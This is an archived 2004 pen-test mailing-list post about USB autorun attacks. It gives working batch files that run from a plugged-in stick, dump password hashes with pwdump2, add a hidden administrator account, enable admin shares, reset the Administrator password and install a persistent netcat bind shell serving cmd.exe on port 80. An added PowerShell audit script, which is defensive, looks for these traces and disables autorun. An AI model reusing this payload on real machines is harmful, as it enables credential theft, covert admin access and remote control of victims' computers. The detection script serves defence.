Re: USB delivered attacks (working example)

From: mak_pen@hotmail.com
Date: Thu Jun 03 2004 - 11:03:11 EDT


In-Reply-To: <BAY15-F11d7KKQpQq5p00043ca6@hotmail.com>

I have been using this "attack" for some time now. Below are the batch files (test.bat, b.bat and autorun.inf; autorun.inf calls test.bat) I use:

*********<BOF test.bat>
@echo off
::start's own switches (/min, /b) must precede the command name; anything after b.bat is passed to b.bat as an argument
@start /min /b b.bat
@exit
<EOF test.bat>


*********<BOF b.bat>
::Open an Explorer window on the stick's directory first; it covers any console window that pops up
@explorer .
@echo off

::Displaying Computer Information for my reference (paths are relative to the stick's root)
@echo %computername% %username% %date% %time% >> Essential\DumpIt\sam.txt
@Essential\DumpIt\pwdump2 >> Essential\DumpIt\sam.txt

::Adding a user for me :o)
::The same account name (__system32__) must be used in the add, group and UserList commands below
@net user __system32__ .z,xmcnvb /add /fullname:"IPC User"
@net localgroup Administrators __system32__ /add

::Hide the Account from being shown on the welcome screen
@reg add "HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList" /v "__system32__" /t REG_DWORD /d 0 /f

::Enabling Admin Shares (the value name is AutoShareWks; a leading @ here would create a value named "@AutoShareWks" instead)
@reg add HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\lanmanserver\parameters /v AutoShareWks /t REG_DWORD /d 1 /f

::Changing Admin Password
@net user administrator .;[pl,mkoijnbhu

::Backdooring (<nc directory> is a placeholder; fill it in before use, and use the same path in the Run value)
@copy nc.exe <nc directory>
@cd /d <nc directory>
@reg add HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run /v "Taskbr" /d "<nc directory>\nc.exe -L -d -p 80 -e cmd.exe" /f

@echo MYUSER: __system32__ .z,xmcnvb >> Essential\DumpIt\sam.txt
@echo Changed Admin Pass: .;[pl,mkoijnbhu >> Essential\DumpIt\sam.txt
@echo ******************************************** >> Essential\DumpIt\sam.txt
@cls
@exit
<EOF b.bat>

I have tried this using a flash memory and it works. What happens is that it opens Explorer showing the current directory so that it hides any shells that might appear, then it does a series of commands which I have documented above.

To prevent against this I have a registry file I use to disable autorun altogether. Contact me if you need it at: mak_pen(at)hotmail(dot)com

Cheers....


>From: "Fred Gravel" <mindedsmasher@hotmail.com>
>To: pen-test@securityfocus.com
>Subject: Re: USB delivered attacks
>Date: Wed, 02 Jun 2004 20:02:14 +0000
>Message-ID: <BAY15-F11d7KKQpQq5p00043ca6@hotmail.com>
>
>And after some search ... autorun is possible on a USB storage device... as
>is explained just below ...
>
>http://www.microsoft.com/whdc/device/storage/usbfaq.mspx
>Q: What must I do to trigger Autorun on my USB storage device?
>If you need to make a USB storage device that executes Autorun, the
>following two conditions must both be true:
>- Media must be marked as removable.
>- The device can be set to either static or removable.
>
>We associate the "removable" nature of a device with the bus that it resides
>on. This means that a disk on an Integrated Device Electronics (IDE) or SCSI
>bus would be considered fixed, whereas a disk on a USB or IEEE 1394 bus
>would be regarded as removable by default. PnP uses a bit in the
>DEVICE_CAPABILITIES structure to determine this. For more information, see
>the DEVICE_CAPABILITIES Plug and Play Structure in the Windows DDK, located
>at
>http://msdn.microsoft.com/library/default.asp?url=/library/en-us/kmarch/hh/kmarch/k112_22r6.asp.
>
>The "removable" nature of media is a property of the device. For example, in
>the case of a CD-ROM or a ZIP drive, the medium can be removed without the
>device itself going away, but on the other hand the medium and the disk
>cannot be separated on static storage PC cards. We obtain this information
>by using the StorageDeviceProperty request. For more information, see the
>STORAGE_DEVICE_DESCRIPTOR Storage Structure in the Windows DDK, located at
>http://msdn.microsoft.com/library/en-us/storage/hh/storage/k306_00qa.asp.
>
>
>----
>Also the autorun could be used in "cooperation" of the desktop.ini file
>included in the folder(s) on the usb storage device if needed...
>
>
>

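As an added example (not code from the original post or from either correspondent): a PowerShell audit script that looks for the artefacts b.bat above leaves behind on a host (an account hidden via SpecialAccounts\UserList, an unexpected local administrator, a Run-key entry launching nc.exe, a live netcat listener, AutoShareWks set) and, with -DisableAutorun, applies the NoDriveTypeAutoRun policy value that a "disable autorun" .reg file normally sets. Assumptions: Windows PowerShell 5.1 or later on a Windows 8 / Server 2012 or newer host (Get-LocalGroupMember and Get-NetTCPConnection are not available on the XP-era systems the post targets), run from an elevated prompt; the $expectedAdmins allow-list and the process-name pattern are placeholders to adjust for your estate.

```powershell
# Added example, not part of the original post. Audits a Windows host for the
# traces left by the b.bat payload above and optionally disables Autorun.
# Assumes Windows PowerShell 5.1+, elevated, on Windows 8 / 2012 or newer.
param([switch]$DisableAutorun)

$findings = @()

# 1. Accounts hidden from the welcome screen: any value under UserList set to 0.
$userList = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList'
if (Test-Path $userList) {
    $key = Get-Item $userList
    foreach ($name in $key.GetValueNames()) {
        if ($key.GetValue($name) -eq 0) {
            $findings += "Account hidden from logon screen: $name"
        }
    }
}

# 2. Local Administrators members outside the allow-list (placeholder list; adjust).
$expectedAdmins = @('Administrator', 'Domain Admins')
foreach ($m in Get-LocalGroupMember -Group 'Administrators') {
    $short = ($m.Name -split '\\')[-1]
    if ($expectedAdmins -notcontains $short) {
        $findings += "Unexpected local Administrators member: $($m.Name) ($($m.PrincipalSource))"
    }
}

# 3. Run-key persistence: b.bat registers nc.exe under the name "Taskbr";
#    flag any Run value whose command line names nc.exe or spawns cmd.exe via -e.
$runKeys = @(
    'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run',
    'HKLM:\SOFTWARE\Wow6432Node\Microsoft\Windows\CurrentVersion\Run',
    'HKCU:\SOFTWARE\Microsoft\Windows\CurrentVersion\Run'
)
foreach ($rk in $runKeys) {
    if (-not (Test-Path $rk)) { continue }
    $k = Get-Item $rk
    foreach ($name in $k.GetValueNames()) {
        $cmd = [string]$k.GetValue($name)
        if ($cmd -match '(?i)\bnc(64)?\.exe\b|-e\s+cmd\.exe') {
            $findings += "Suspicious Run entry '$name' in ${rk}: $cmd"
        }
    }
}

# 4. A netcat-style process currently listening (b.bat binds cmd.exe to TCP 80).
foreach ($c in Get-NetTCPConnection -State Listen -ErrorAction SilentlyContinue) {
    $p = Get-Process -Id $c.OwningProcess -ErrorAction SilentlyContinue
    if ($p -and $p.ProcessName -match '^(nc|nc64|ncat)$') {   # placeholder pattern
        $findings += "netcat-style listener pid $($p.Id) ($($p.ProcessName)) on port $($c.LocalPort)"
    }
}

# 5. AutoShareWks: 1, or absent, means C$/ADMIN$ are recreated at each boot.
$lanman = 'HKLM:\SYSTEM\CurrentControlSet\Services\LanmanServer\Parameters'
$asw = (Get-ItemProperty -Path $lanman -Name AutoShareWks -ErrorAction SilentlyContinue).AutoShareWks
if ($null -eq $asw -or $asw -ne 0) {
    $findings += "AutoShareWks is not 0 (administrative shares are created at boot)"
}

# 6. Optional hardening: NoDriveTypeAutoRun = 0xFF disables Autorun for every
#    drive type, which is what a "disable autorun" .reg file normally sets.
if ($DisableAutorun) {
    $pol = 'HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\Explorer'
    New-Item -Path $pol -Force | Out-Null
    New-ItemProperty -Path $pol -Name NoDriveTypeAutoRun -PropertyType DWord -Value 0xFF -Force | Out-Null
    $findings += "NoDriveTypeAutoRun set to 0xFF under $pol"
}

if ($findings.Count -eq 0) { 'No b.bat-style artefacts found.' } else { $findings }
```

Run it as `.\Audit-UsbPayload.ps1` to list findings, or `.\Audit-UsbPayload.ps1 -DisableAutorun` to also write the policy value; the script name is arbitrary. Checks 1 and 3 rely only on registry reads and work on any supported Windows version, so they can be kept even where the LocalAccounts and NetTCPIP cmdlets are unavailable.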


This archive was generated by hypermail 2.1.7 : Sat Apr 12 2008 - 10:53:55 EDT